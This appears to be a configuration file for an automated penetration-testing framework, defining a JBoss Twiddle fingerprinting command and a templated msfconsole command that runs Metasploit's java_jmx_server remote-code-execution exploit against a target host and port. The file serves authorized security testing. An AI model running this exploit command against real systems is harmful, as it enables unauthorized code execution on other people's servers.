[general]
tools_categories = fingerprinting, code_execution


[tool_twiddle]
name = twiddle
category = fingerprinting
description = Standalone version of the CLI based JMX tool Twiddle by JBoss
command = ./bin/twiddle.sh -v --host=[IP] --port=[PORT] serverinfo -d -c -l 2>&1 | tee [OUTPUT] && ./bin/twiddle.sh -v --host=[IP] --port=[PORT] get "jboss.system:type=ServerInfo" 2>&1 | tee [OUTPUT]
install = git clone https://github.com/swesource/twiddle-standalone.git .
update = git pull

[usemulti_msf_java_jmx_server]
name = MSF_java_jmx_server
tool_ref_name = metasploit
category = code_execution
description = Metasploit module - exploit/multi/misc/java_jmx_server - JMX interfaces with authentication disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable and interfaces with authentication enabled will be vulnerable only if a weak configuration is deployed (allowing to use javax.management.loading.MLet, having a security manager allowing to load a ClassLoader MBean, etc.)
command = sudo msfconsole -x "use exploit/multi/misc/java_jmx_server; set RHOST [HOST]; set RPORT [PORT]; set VERBOSE true; set LPORT 8443; exploit; exit"


# Add MJet